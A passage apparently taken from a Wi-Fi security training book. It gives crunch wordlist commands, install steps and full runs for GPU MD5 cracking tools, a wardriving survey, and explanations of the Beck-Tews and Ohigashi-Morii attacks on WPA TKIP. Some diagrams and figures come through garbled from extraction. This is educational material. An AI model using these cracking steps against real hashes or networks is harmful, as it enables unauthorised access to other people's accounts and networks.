0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
lalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzĂ¤Ă¶ĂĽĂź0123456789
!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
mixalpha = [abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ ]
mixalpha-numeric = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789]
mixalpha-numeric-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
WXYZ0123456789 ]
mixalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP
QRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
RSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
Examples
Let’s build a list of words 5 to 6 characters long, with only lowercase
alphanumeric characters allowed.
[root@localhost hackme]# cd ~/cuda-ext/crunch-1.6/

[root@localhost crunch-1.6]# ./crunch 5 6 -f charset.lst lalpha-numeric
-owordlist.txt
Wordlist.txt is the output dictionary file. If you need to, you can
define custom charsets in charset.lst.
Less experienced users have a bad habit of using a first name and
two digits denoting a birth year for passwords. The fixed pattern is
nameXX (X – digit). Thanks to crunch, you can effortlessly create
a list of possible passwords matching a given template for the name
Andrew:
[root@localhost crunch-1.6]# ./crunch 9 9 -f charset.lst numeric

-owordlist.txt -t andrzej@@
The lines in the output file can look like this:
andrew00
andrew01
...
andrew99
Where to get a dictionary

Many ready-to-use, comprehensive dictionaries in a number
of language versions can be found on the web. Follow this
link for thorough wordlists in several languages, containing
even millions of entries: http://ftp.se.kde.org/pub/security/
tools/net/Openwall/wordlists/languages/
Appendix A: CUDA-powered cracking

of MD4/MD5 hashes
What is MD5?
MD5 is a commonly used cryptographic hash function that can
transform any input into an encoded 128-bit hash. A widespread
application of MD5 is using it to verify the correctness of files, for
example packages downloaded from the Internet. By generating a
hash of the download and a hash of the original file, you can quickly
see if they match and whether the download could be corrupted.
As for security applications, MD5 is often used for encrypting

passwords stored in databases and in authenticating users.
A sample authorization process during logging to a site, in brief:
a user submits a password, the password is processed with the
MD5 algorithm and then matched with the hash stored in the site
database.
Here’s the MD5 hash for the phrase ‘Hacking School Rulez’.
MD5(„Hacking School Rulez”) = „07f2144d69df29e78af3ede403d65a2e”
Brute force can be used to defeat MD5. That said, this process can be
quite time-consuming if the password to crack is long. Now, we are
going to test the Multiforcer and MD5 GPU Crack applications (both
make use of the advanced CUDA computing capability) and see how
they perform with hashes likes these.
CUDA-Multiforcer
CUDA-Multiforcer belongs to the most efficient MD4/MD5 and
NTLM hash cracking platforms. A GPU with CUDA support brings
the utility up to its full potential.
Appendix A: CUDA-powered cracking of MD4/MD5 hashes 147
Installation
Compile the Argtable library to be able to set up Multiforcer.
All the extensions can be found inside cuda-ext. Unpack
argtable2-11.tar.gz.

[root@localhost cuda-ext]# tar xfz argtable2-11.tar.gz
The argtable2-11 directory now contains an unzipped archive to

configure and compile.
[root@localhost cuda-ext]# cd argtable2-11

[root@localhost argtable2-11]# ./configure –prefix=/
[root@localhost argtable2-11]# make
[root@localhost argtable2-11]# make install
When this is done, you can move on to the tool proper. Unpack
Multiforcer.
[root@localhost argtable2-11]# cd ..
[root@localhost cuda-ext]# tar xfj CUDA-Multiforcer-src-0.7.tar.bz2
!
Note. You must have SDK installed to build CUDA-Multiforcer. Go
back to ‘Drivers and development environment configuration’ for
tips on how to install SDK.
Copy the Multiforcer directory to NVIDIA SDK and compile the NOTE
sources.
[root@localhost cuda-ext]# cp -r CUDA-Multiforcer-Release ~/NVIDIA_GPU_

Computing_SDK/C/src/
[root@localhost cuda-ext]# cd ~/NVIDIA_GPU_Computing_SDK/C
[root@localhost C]# make
The tool is now ready to use.
[root@localhost C]# cd bin/linux/release/CUDA-Multiforcer

[root@localhost CUDA-Multiforcer]cp ./CUDA-Multiforcer /usr/local/bin/

-h / --hashtype {MD4,MD5,NTLM}: (required) the hash type to
search
-c / --charsetfile <file name>: (required) the charset file
-o / --outputfile: (optional) writes found hashes to a file
-f / --hashfile: (required) the file with hashes to crack (one

hash per line)
-v: (optional) the verbose mode, returns more detailed

information
--min / --max: (required) the minimum and maximum

password length (0-14)
-d / --device: (optional) selects a CUDA device (default: 0,

the first CUDA GPU device)
-b / --blocks: (optional) forces a specific block count (default:

128)
-t / --threads: (optional) forces a specific thread count (default:

64)
--maxthreads: (optional) sets the number of blocks per threat on

higher-end cards (8800, 9800, GTX) to improve computational
performance
--autotune: (optional) in this mode, the tool automatically

adjusts its parameters for best performance
Examples
Below are the steps for cracking an MD5 hash. We will use the
sample hashes included in the tool.
Move to an appropriate directory.
[root@localhost C]# cd ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release/

CUDA-Multiforcer
Inside test _ hashes you’ll find sample files to crack, while charsets
contains files with specified character sets.
Call the program with suitable parameters.
[root@localhost CUDA-Multiforcer-Release]# CUDA-Multiforcer -h FASTMD5

-f test_hashes/Hashes-MD5-Full.txt --min 1 --max 6 -c charsets/charsetlikely
The parameters:
-h FASTMD5: a hash type
-f test _ hashes/Hashes-MD5-Full.txt: an input hash file
--min 1: the minimum password length is 1 character
--max 6: the maximum password length is 6 characters
-c charsets/charsetlikely: specifies the character set
[root@localhost CUDA-Multiforcer-Release]# CUDA-Multiforcer -h FASTMD5

-f test_hashes/Hashes-MD5-Full.txt --min 1 --max 6 -c charsets/charsetlikely
Cryptohaze.com CUDA Multiforcer (multiple hash brute forcer)
by Bitweasil
Version 0.70, length 0-14
Currently supported hash types: MD5 FASTMD5 MD4 FASTMD4 NTLM FASTNTLM SHA1
FASTSHA1
Hash type: FASTMD5
CUDA Device Information:
Device 0: „GeForce 9600M GT”
Number of cores: 32
Clock rate: 1.25 GHz

Memory (total): 511 MB
Memory (free): 458 MB
Single charset loaded.

Loading & sorting hashes. This may take awhile.
Returning from sort.
Hashes loaded (14 hashes)
You may want to consider the FAST[hash] option if it exists.
Done with copy to constant
Launching kernel for password length 1
------------------------------------------
Compute done: Reference time 0.0 seconds

Stepping rate: 0.0M MD4/s
Search rate: 0.1M NTLM/s
------------------------------------------

FASTMD5 : 900150983CD24FB0D6963F7D28E17F72: ‘abc’ 0x616263

FASTMD5 : BAE60998FFE4923B131E3D6E4C19993E: ‘bad’ 0x626164
------------------------------------------


Done: 19.11% Step rate: 55.0M/s Search rate: 770.5M/sec
FASTMD5 : 07ABD0332476B39CB052C2A190FEAC5E: ‘Bwah’ 0x42776168
FASTMD5 : 81DC9BDB52D04DC20036DBD8313ED055: ‘1234’ 0x31323334
FASTMD5 : E91E7B89B7929ACC24607743A524D6BD: ‘P4s$’ 0x50347324
------------------------------------------


FASTMD5 : C55DC1C662628C7B3B85635A4E96262A: ‘GoOd!’ 0x476F4F6421
FASTMD5 : EA7767B55A3981F2B27291FCD25D4E69: ‘G0o|)’ 0x47306F7C29
FASTMD5 : 03AA7BDDFE8612B37F2B122DA2843903: ‘GPGPU’ 0x4750475055
------------------------------------------


^Cne: 0.10% Step rate: 53.7M/s Search rate: 751.1M/sec
We aborted the cracking. Within more or less a minute Multiforcer

managed to find matches for 8 out of 14 hashes to compute.
The password stepping rate for MD5 averages 55 million hashes per
second. As always, we leave it to you to draw your own conclusions.
GPU MD5 Crack

Like Multiforcer, GPU MD5 Crack can be used to quickly determine an
MD5-encoded string. It also supports CUDA, allowing you to make
use of CUDA-enabled GPUs.
Installation
The archive containing the tool can be found inside cuda-ext.
Unpack it.

[root@localhost cuda-ext]# unzip gpu_md5_crack_0.2.3_lgpl.zip
The GPU_MD5_Crack_0.2.3.LGPL directory contains the

unzipped archive. Start compiling.
[root@localhost cuda-ext]# cd GPU_MD5_Crack_0.2.3_LGPL/

[root@localhost GPU_MD5_Crack_0.2.3_LGPL]# make CUDA_INSTALL_PATH=/usr/local/cuda
The tool is ready to use. You can find it inside bin/linux/release.

Syntax for calling the tool (three types):
gpu_md5_crack_0.2.3 < -h MD5_hash_to_crack > [options]

gpu_md5_crack_0.2.3 < -l show_CUDA_devices> [options]
gpu_md5_crack_0.2.3 < -b benchmark> [options]
[options]:
-c <charset number>: (default: 2), 0=[0-9], 1=[a-z], 2=[a-z0-9],

3=[A-Z], 4=[A-Z0-9], 5=[A-Za-z], 6=[A-Za-z0-9], 7=all printables
-d <CUDA device ID>: (default: the first CUDA device), see the -l
option to list the CUDA devices in the system
-s <start password>
-t <total number of passwords to test> (default: 1 billion)
You can use this syntax:
[root@localhost release]# ./gpu_md5_crack_0.2.3 -h

098f6bcd4621d373cade4e832627b4f6 -s a-t 1000000000
You can press Ctrl+C to stop the brute-forcing.

Examples
We’ll use the benchmark mode to test the performance of
MD5 GPU Crack.
[root@localhost release]# ./gpu_md5_crack_0.2.3 -b
...
Benchmark Start
Using default CUDA GPU device:0
Cuda device ID:0, Device name:GeForce 9600M GT, supporting CUDA:1.1,
multiProcessorCount:4, clockRate:1250.00 MHz, TotalMem:511.69 MB
******* Test 0 Start *******
Expected Password: 1234567890
MD5 Hash:e807f1fcf82d132f9bb018ca6738a19f, Start Password:1200000000,
Total pwd to check:1000000000
Charset used 0:0123456789
MD5 brute force started
Progress 3%, Pwd:1232002520, Instant 45.72 Mhash/s(175.00 ms)
MD5 Cracked pwd=1234567890 hash=e807f1fcf82d132f9bb018ca6738a19f
Instant 47.06 Mhash/s(170.00 ms)
Average 46.52 Mhash/s, Total Time:0.86s(860.00 ms)
MD5 brute force finished
******* Test 0 End *******
******* Test 1 Start *******

Expected Password: azerty
MD5 Hash:ab4f63f9ac65152575886860dde480a1, Start Password:,
Charset used 1:abcdefghijklmnopqrstuvwxyz
Progress 1%, Pwd:ahzjla, Instant 53.34 Mhash/s(150.00 ms)
MD5 Cracked pwd=azerty hash=ab4f63f9ac65152575886860dde480a1
******* Test 1 End *******
******* Test 2 Start *******

Expected Password: azer09
MD5 Hash:41b9cabe6033932eb3037fc933060adc, Start Password:,
Charset used 2:abcdefghijklmnopqrstuvwxyz0123456789
Progress 9%, Pwd:aue0xa, Instant 55.18 Mhash/s(145.00 ms)

MD5 Cracked pwd=azer09 hash=41b9cabe6033932eb3037fc933060adc
******* Test 2 End *******
******* Test 3 Start *******

Expected Password: AZBVSD
MD5 Hash:fd049008572788d60140aaead79336cc, Start Password:,
Charset used 3:ABCDEFGHIJKLMNOPQRSTUVWXYZ
Progress 1%, Pwd:AHZJLA, Instant 53.34 Mhash/s(150.00 ms)
MD5 Cracked pwd=AZBVSD hash=fd049008572788d60140aaead79336cc
******* Test 3 End *******
******* Test 4 Start *******

Expected Password: AZ09AA
MD5 Hash:7a552dd9cdd49acc5320bad9c29c9722, Start Password:,
Charset used 4:ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Progress 9%, Pwd:AUE0XA, Instant 55.18 Mhash/s(145.00 ms)
MD5 Cracked pwd=AZ09AA hash=7a552dd9cdd49acc5320bad9c29c9722
******* Test 4 End *******
******* Test 5 Start *******

Expected Password: zaZAab
MD5 Hash:aef49f70bb7b923b8bc0a018f916ef64, Start Password:zCAAAA,
Charset used 5:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Progress 17%, Pwd:zaDpoA, Instant 55.18 Mhash/s(145.00 ms)
MD5 Cracked pwd=zaZAab hash=aef49f70bb7b923b8bc0a018f916ef64
******* Test 5 End *******
******* Test 6 Start *******

Expected Password: za0ZA9
MD5 Hash:062cc3b1302759722f48ac0b95b75803, Start Password:zaAAAA,
Charset used 6:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
MD5 Cracked pwd=za0ZA9 hash=062cc3b1302759722f48ac0b95b75803

******* Test 6 End *******
******* Test 7 Start *******

Expected Password: a^-*|
MD5 Hash:cf7dcf4c3eeb6255668393242fcce273, Start Password:a0000,
Charset used 7: !”#$%&’()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
àbcdefghijklmnopqrstuvwxyz{|}~
Progress 3%, Pwd:aVb! , Instant 55.18 Mhash/s(145.00 ms)
MD5 Cracked pwd=a^-*| hash=cf7dcf4c3eeb6255668393242fcce273
******* Test 7 End *******
Benchmark End
The benchmark shows that GPU MD5 Crack can allow you to crack
MD5 with a speed of 50 to 55 million hashes per second. This rate
is comparable to the results you can achieve with CUDA-Multiforcer.
As demonstrated, both utilities offer a similar high performance.

The fact that Multiforcer has support for other hash types like
NTLM or SHA-1 gives it the edge over the GPU MD5 Crack as it is
more universal in scope.
Appendix B: Wardriving experiment

You can find comprehensive WLAN structure and security reports
online. Below are the results of a short experiment designed to test
the security of Wi-Fi networks in real life, conducted over a large
urban area in Poland with a population of more than half a million.
The enquiry covered over 1,500 detected wireless networks and
sought to identify their ESSIDs, used security solutions and detailed
GPS coordinates.
Through the research, we wanted to provide reliable information

about the real life Wi-Fi security landscape of the area and disclose
the most popular ESSIDs to generate rainbow tables.
Hardware
– Netbook Asus eeePC
– wireless USB network adapter 100 mW
– omnidirectional antenna 12 dBi
– Bluetooth GPS
– software: Training Operating System v2.0 + Kismet + GPSd
A moving car equipped with that gear enables quick travel and
picking necessary information within just several hours of driving.
Research methodology
Kismet saves discovered wireless network locations. All information
is written in the universal, easy-to-process CSV format. Using the
online app http://www.gpsvisualizer.com, it is possible to create
Appendix B: Wardriving experiment 157
a visualization of the routes and put the known wireless networks on

the map.
Results
Here’s the most common ESSID names we have obtained in the
experiment.
Position ESSID Found %

1 NETGEAR 59 4
2 Linksys 58 4
3 Dlink 51 3.4
4 Default 28 2
5 TP-LINK 21 1.4
6 Home 18 1.2
7 ASMAX_BR_704G 7 0.5
8 Wireless-G Router 7 0.5
9 Belkin54g 5 0.35
10 Motorola 5 0.35
TOTAL 259 17.7
Rainbow tables for only ten of the most popular ESSID values could
give us access to close to 20% of the tested networks. Other frequent
ESSIDs not on the list are popular first names. After expanding
them to add some common names, rainbow tables can wield a 40%
effectiveness in attacks against the networks in the test group.
Security Found %
None or WEP 575 38.3
WPA-TKIP 345 23
WPA-AES/WPA2 580 38.7
The statistics are alarming. Almost four in ten wireless networks are
open or only use WEP, which provides next to no security, and as we
have proved on these pages, can be broken in a matter of minutes.
23% networks are protected, but not sufficiently so, only utilizing
the WPA TKIP mechanism that cannot guarantee strong security.
38.7% networks can be said to be secure and do provide adequate

protection to users. Still, the test monitored used mechanisms only,
and security also relies on a complicated and strong password.
Summary
The experiment demonstrates that many users pay little attention
to securing themselves and their Wi-Fi networks. Most of the
times the communications inside a network could be captured by
an adversary, and over half of the analyzed networks use legacy
security solutions that need to be superseded or need their ESSIDs
reconfigured.
7
Chapter 7
Advanced attacks against

WPA
Chapter outline:
1. WPA TKIP attack
2. WPA TKIP broken
3. Beck-Tews attack enhanced
4. Michael Reset attack
5. Summary
WKA TKIP attack

As demonstrated, WEP is essentially incapable of guarding a WLAN
from unauthorized access. Drawing on some newly developed
attack techniques, an adversary can recover the wireless key in
under two minutes. In view of this peril, a stopgap solution was
introduced to optimize WEP. The idea for this new solution was to
keep it compatible with legacy hardware. The works brought forth
160 Chapter 7 – Advanced attacks against WPA
a new security standard, Wi-Fi Protected Access (WPA) with TKIP

(Temporal Key Integrity Protocol). Even if improved on in some
ways, TKIP is still constructed from the same WEP blocks. With
time, it also was discovered to be flawed. In 2008 Erik Tews and
Martin Beck released a paper documenting a possible exploit against
this protocol.
For a detailed overview of Tews and Beck’s November 2008

attack, go to http://dl.aircrack-ng.org/breakingwepandwpa.pdf.
Also available is a paper on an enhanced version of the
attack, published by M. Beck in February 2010. It can be
found at http://download.aircrack-ng.org/wiki-files/doc/
enhanced _ tkip _ michael.pdf
In this part of the lecture, we are going to cover the main points of
the attack. For everything else, consult the original text.
Here’s a list of the changes implemented in WEP by TKIP:
1. The use of MIC (Message Integrity Code), a checksum

generated by the Michael algorithm to prevent forging sent
packets.
2. The introduction of TSC (TKIP Sequence Counter).
3. The implementation of an additional key mixing function

before the key is passed to RC4.
WKA TKIP attack 161
Creating a packet
To understand these additions better, below is a diagram showing
the process of creating an encrypted packet:
TA
Phase 1 WEP seed
TK TTAK (IV + RC4)
Key
mixing IV
Phase 2
TSC
Key RC4 Encrypted
mixing WEP
DA, SA, Priority, MPDU
Plaintext MSDU,
Data
Michael Fragmentation
MIC key Plaintext
MSDU + MIC
Figure 20: TKIP encryption process
A brief description of the terms and abbreviations you need to know

to understand how a packet is constructed and encrypted:
TA: Transmitter Address, the source (AP) MAC address
TK: Temporal Key, a 128-bit session key
TSC: TKIP Sequence Counter
TTAK: TKIP-mixed Transmit Address and Key, the output

of the Phase 1 Key mixing (80 bits)
DA: Destination (MAC) Address
SA: Source (MAC) Address
MSDU: MAC Service Data Unit, the packet before it

is fragmented and encrypted
MPDU: MAC Protocol Data Unit, the packet after it is

fragmented and encrypted
Let’s now briefly study the model.
The TK (Temporal Key) is calculated by the four-way handshake.

Phase 1 Key mixing uses the 32 most significant buts of the TSC
(TKIP Sequence Counter), the session key (TK) and the Transmitter
Address (TA). The result is an 80-bit TTAK string.
The next phase is a function that mixes the TTAK, the TK and the 16
least significant bits of the TSC. The output is the WEP seed: a 24-bit
initialization vector and a 104-bit RC4 key.
It is worth it to note that the TTAK needs to be generated every 216

(65,536) packet since 32 most significant bits of the sequence counter
(TSC) are used in the first phase. Phase 2 is computed for every
packet. The computation is split into two phases to accommodate
the processing speed of older WEP devices.
Michael takes the following values as input: the SA, DA, priority
and the MIC. As a result, the TSC and the generated MIC code are
fragmented and passed to the WEP block as plaintext. The rest of the
frame creation process is identical to the WEP encryption.
An encrypted frame:
Encrypted
MAC Extended
IV / KeyID Data (PDU) MIC ICV FCS
header IV
Figure 21: An encrypted packet format

WKA TKIP attack 163
TKIP Sequence Counter

The addition of the TKIP Sequence Counter suppresses the chief
problems with WEP initialization vectors: their too-short length
and the fact they provided no protection against replay attacks and
the usage of weak keys.
The operation of a 48-bit TSC is simple: when a packet that is being

send has a sequence counter value equal or smaller than the value
of the previous frame, it is rejected. This tactic eradicates replay
attacks. The TSC is set to 1 when the TK is renewed.
Message Integrity Code (MIC)

Preventing a message from being spoofed in WEP leaves much to be
desired, and the main culprit is CRC32. In order to frustrate packet
manipulation, the additional MIC code has been implemented.
It is based on the Michael algorithm, a more secure solution than
CRC32. As it has transpired, however, Michael also proves too weak,
offering only 220 possible combinations. In the worst case scenario a
million attempts would have to be executed to crack it.
In order to prevent brute force attacks, a security measure was

added that stops network traffic for 60 seconds and removes all
session (TK) keys if an incorrect MIC is submitted. After a minute
elapses, clients are reauthenticated with new session keys created.
An attacker consequently is only able to run one test per minute,
which makes brute-forcing virtually infeasible. The TKIP MIC
failure holdoff time feature takes effect only is a sent frame has
a correct ICV checksum and an incorrect MIC.
QoS: Quality of Service, Wi-Fi Multimedia: WMM

The IEEE 802.11e standard puts forward updates to implement
multichannel operation/prioritizing network traffic by different
classes of networking. An access point needs to support QoS for the
Tews-Beck attack to succeed.
There are 16 different channels in QoS, and only four in WMM

since channels are grouped into a class in the latter model. Every
QoS channel has its own sequence counter, which means you
can retransmit a frame on another channel where the TSC is
greater than the TSC of a previous frame (if not, the packet will be
rejected). Most traffic is typically sent over channel 0 on a network,
so practically always the next channels will have a lower TSC than
channel 0, making the network vulnerable to the chopchop attack.
TKIP attack
Having covered the theoretical background of how TKIP
works, let’s now move on to the actual subject of this part of the
lecture. Erik Tews and Martin Beck have demonstrated how
a modified chopchop attack can be used to mount an attack
against TKIP. Implementing the exploit, an aircrack-ng
suite tool has been created for the purpose. Tkiptun-ng can
allow you to run the attack even if you know next to nothing
about the theory behind it. At present the utility is still under
development, and you can check for implementation updates here:
http://www.aircrack-ng.org/doku.php?id=tkiptun-ng
Requirements
There are serious limitations imposed on the attack. An access point
must support Quality of Service (QoS) features to allow for the usage
of the chopchop technique. Without QoS turned on, it would not
WKA TKIP attack 165
be possible to use it as the TKIP Sequence Counter is a successful

shield against replay attacks. As mentioned, QoS can allow you to
change a transmission channel and send a frame on a channel that
has a smaller TSC. Most modern APs have QoS enabled.
Another restriction is the key renewal time. After this time, a new
session key (TK, Temporal Key) is negotiated. As a rule of thumb,
the Key Renewal Interval is set in the AP to 3,600 seconds (an hour).
The attack needs to end under an hour from its start; otherwise it
would need to be executed again from scratch. Compared with the
standard chopchop, the attack takes longer as it has to deal with an
anti-brute force solution, the MIC failure holdoff time mechanism.
It is essential to remember the attack does not recover the wireless

network key. Instead, it allows you to obtain the session key to inject
encrypted frames. As a consequence, it could enable you to for
example redirect traffic from a client to your host.
Attack stages:
1. Deauthentication
2. Modified chopchop
3. Guessing and verifying the remains of the frame
4. Reversing Michael
The following diagram perfectly illustrates how the attack proceeds

step by step.
START
Deauthenticate
Capture ARP packet
Done YES
chopping
bytes?
NO Guess IP address
Chop next byte
ICV
Guess byte NO correct?
YES YES
MIC NO Number
Reverse Michael
of guesses
failure?
<256?
YES NO
Wait 60 seconds Wait 60 seconds STOP
Figure 22: TKIP attack model
Deauthenticating a client is step one. Owing to this, at the

subsequent reauthentication, you are able to get hold of the four-way
handshake. Once the packets are captured, a chopchop-style attack
can be mounted.
The modified chopchop attack cuts off the last byte and attempts
to guess the encrypted value. If your particular guess is wrong
for a byte, the ICV and MIC values should not be correct and the
WKA TKIP attack 167
frame will be discarded by the AP without stopping network traffic.

However, if the ICV is correct while the MIC is not, this means you
have successfully identified the relevant value. A MIC failure report
will be issued, which suspends all traffic in a network for 60 seconds.
Wait until the end of this period and start cracking the next byte.
Bearing in mind the TSC counter, every consecutive packet must

be sent on a different channel with a lower counter state. The TSC
only increments when a packet is received, and so testing the next
values for chopped bytes should increase the counter value with
every packet that is sent. The incrementation does not occur when
you send a frame with a correctly guessed byte, as it should stop the
network traffic for 60 seconds (a MIC failure).
Chopchop enables you to determine at most 60 bytes in 60 minutes.

That said, not all data in packets is unknown; you can predict some
values. Beck and Tews’ attack assumes you decrypt ARP packets.
The MAC address in ARP packets is always sent in the clear, so you
only need to determine the IP address, a quite simple step. In local
area networks IP addresses usually have the following formats:
192.168.X.Y or 10.0.X.Y, and because of this, identifying these
addresses should only take several attempts.
The last stage is reversing the Michael algorithm that is used to

secure the MIC key. Michael is not a typical one-way function and
can be easily reversed. With a recovered MIC key, you can generate
encrypted packets and inject them into a network.
Countermeasures
One of the effective remedies against the TKIP attack (without
disabling QoS enhancements) is setting the Key Renewal Interval
low, for example to 120 seconds. This meant you could not decrypt
more than 2 bytes using the chopchop attack. Still, protocols other
than WPA with TKIP are more recommended, for example WPA2
CCMP, which is based on AES. However, even disabling QoS
support offers just a degree of security rather than total protection.
WPA TKIP broken 169
WPA TKIP broken

Presented at a Taiwan security conference by researchers Toshihiro
Ohigashi and Masakatu Morii, a new and faster attack takes
advantage of the WPA TKIP flaw without requiring the QoS support
to work. The Ohigashi-Morii exploit reduces attack execution time
from 15 minutes to 60 seconds (in an ideal scenario).
The Japanese team could let go of the QoS vulnerability as they

used the Man-in-the-middle (MITM) attack to capture all user
communications. Ohigashi and Morii’s attack builds on the Beck-
Tews attack and targets ARP packets, which have most of their
components known except for the last two bytes.
Ohigashi and Morii propose two variants of the MITM attack. The
first model assumes the access point and client cannot hear one
another due to the distance between them.
AP Attacker
Client
Figure 23: MITM: an indirect communication (repeater)
An attacker acts like an intermediary (repeater), passing packets

between the client and AP without modifying them. The attack also
enables you to inject forged packets. Wireless network users will find
it difficult to detect the attack since there is no physical connection

between the AP and client.
Another, more effective MITM-based schema is using a directional

antenna for injection. As long as a sent packet doesn’t reach the
sender, it is hard to detect the attack.
Directional antenna
AP Attacker
Client
Figure 24: MITM: using a directional antenna
In a MITM attack, user communications are captured until the

chopchop attack ends. To prevent network downtimes triggered
by MIC failures, and in order to meet the TKIP Sequence
Counter requirement, Ohigashi and Morii present 3 modes of
communication:
– Repeater mode: the attacker passes along traffic in both

directions with no modification.
– MIC key recovery mode: the goal of this mode is to recover

a MIC key. The checksum and MIC are obtained in a
chopchop attack.
– Message falsification mode: in this mode, the attacker

falsifies messages using a MIC key.
Beck-Tews attack enhanced 171
If the chopchop attack is not mounted, the selected mode is repeater.

The mode does not cause any interruption in transmission. The
MIC key recovery mode might be useful when most sent packets
in a WLAN are ARP requests/responses. The risk of a networking
hold-up is very small if that is the case. When a MIC key is
recovered, the message falsification mode starts.
Thanks to implementing 3 different modes, the total holdoff is

reduced to four minutes in the best case. What is more, Ohigashi
and Morii have proposed an even faster message falsification
tactic. Since during the MIC key recovery the attacker knows the
IP address of the access point, the number of unknown bytes in an
ARP packet drops to just one. They have also found a method to
reduce the MIC failure holdoff time. The Beck-Tews attack recovers
4 bytes of the checksum, producing at best a three-minute wait time
for MIC failures. The Japanese researchers propose to recover only
the last checksum byte in a chopchop attack, reducing the attack
time to 1 minute. As they claim, about 37% of encrypted ARP
packets can be recovered within a minute.
For a more detailed description of the attack, read

the original paper by Toshihiro Ohigashi and Masakatu Morii,
available at: http://packetstormsecurity.com/files/80654/
A-Practical-Message-Falsification-Attack-On-WPA.html
Beck-Tews attack enhanced

On February 25, 2010, Martin Beck released documentation
detailing an improved variant of the attack against TKIP. The
Beck-Tews exploit presented in late 2008 was not without serious
limitations. By using a chopchop attack, MIC failures and reversing
Michael, you could be able to recover the MIC key needed to
construct a manipulated packet and transmit it to a network. The
target of the attack were always ARP packets, whose structure is

largely known or can be easily guessed, with few unidentified bytes
left. The 40-byte keystream derived in a Beck-Tews attack enables an
assailant to inject a short packet with a strict pattern: 4 bytes of ICV
and 8 bytes of MIC, leaving only 28 bytes of space for data.
One of the objectives of Beck’s new model was to find a way to

continuously generate new keystreams so that a virtually arbitrary
number of packets can be transmitted.
Fragmentation was used to increase the length of packets to send.

The wireless standard supports frame fragmentation of up to 16
partitions. Even so, it requires a unique pair of initialization vector
and keystream and necessitates the use of 16 different keystreams.
The Beck-Tews attack takes about 15 minutes and recovers a mere
40 bytes of keystream. Due to these limitations, it is impossible to
obtain a sufficient number of keystream bytes in a relatively short
time to send a larger packet.
Keep in mind that the packets flowing in WLANs are mostly ARP
and IPv4 packets. The chopchop exploit in Beck and Tews builds on
ARP packets whose content, as you know, can be easily guessed. The
attack allows you to receive 40 bytes of keystream.
Beck’s new adoption of the attack uses both ARP and IPv4 packets.
The researcher assumes that the 8-byte LLC header prepending both
IPv4 and ARP packets is fully known.
Let’s see how a keystream is collected from IP packets transmitted in

a wireless network. First, this is the packet structure:
Beck-Tews attack enhanced 173
bit 0–3 4–7 8–15 16–18 19–31

offset
0 Differentia-
Version and IHL
ted services Total length
(0x45/0x46)
(0x00/0xc0)
32 Fragment
Identification Flags
Offset
64 Time to live Protocol Header checksum
96 Source IP address
128 Destination IP address
160 Options
160
or Data
192+
Suppose you have captured an IP packet. Its format is known and

you can guess some values sent in the packet. The first 8-bit field
carries information related to version and Internet Header Length,
and can take either of the two values: 0x45 or 0x46. The next known
packet element is the 1 byte of differentiated services, which takes
0x00 or 0xc0. The next two bytes define the total length of a packet
and can be calculated in an easy way. From the packet format
alone, you can predict 4 bytes, and consequently obtain 4 bytes of
keystream.
ARP and IP packets are both prepended with the 8-byte LLC
header, which is fully known. This means you can get another
8 bytes of keystream with no effort. As a result, you can use 12 bytes
of keystream, all recovered simply from the way the IP packet is
constructed.
But to build a packet larger than that, fragmentation is required.

As mentioned earlier, you can fragment a message to send into
16 parts at the most. Each fragment needs to include an ICV value
(4 bytes), while the MIC (8 bytes) is only added to the last packet.
Assuming 16 IP packets are sniffed, you can recover in total 192

bytes of keystream (16 packets x 12 keystream bytes). However,
not all 192 bytes can be used as data bytes. Remember an ICV
has to be included in all packet fragments (16 fragments x 4 bytes
ICV = 64 bytes). Subtract the 64 bytes reserved for ICV from the
192 keystream bytes, and you have 128 keystream bytes left to use.
As you also need to add a MIC (8 bytes) to the last fragment, this
means that ultimately you can only use 120 data bytes for sending.
Captures of ARP packets meanwhile produce up to 40 bytes

of keystream. This is enough to send a message 640 bytes in size
(16 fragments x 40 bytes). Since 64 bytes of ICV and 8 bytes of MIC
have to be included, there are 568 bytes of data to send.
Beck’s paper outlines a scenario that allows you to decipher and

inject packets to a network client bypassing sent packet length
restrictions. That said, new limitations appear: the AP must be
running Linux and the client must have open TCP ports. Using the
fragmentation exploit described above, the attacker sends falsified
TCP packets. Thanks to this schema, it is possible to generate 60
bytes of keystream with a speed that depends on the wireless
connection.
Michael Reset attack 175
Michael Reset attack

As you remember, TKIP makes use of the Michael algorithm.
Michael is not a one-way function and its operation can be reversed.
Even if the algorithm’s mode of operation has not been presented
earlier, we will try to give you a good look at what Beck wants to
achieve in the Michael Reset attack.
At initialization, two key words are set that act as the internal state.
Based on the set state (the key words), the next 32-bit words are
generated.
Our objective is to keep calculating these words until the current

internal word values equal the initial state. Beck claims there is a way
to reset the values of the internal state to the initial state. All data ‘in
front’ of a packet would then have no meaning for the resultant MIC
value as you start the recomputation from the exact same words as in
the initial state.
What this implies is that you may be able to add an extra data
fragment to an unknown packet in such a way that the MIC value
for the entire packet does not change. For this to work, you need
to derive two ‘magic words’ that match both the inserted and the
original packet so that the internal state of Michael is reset.
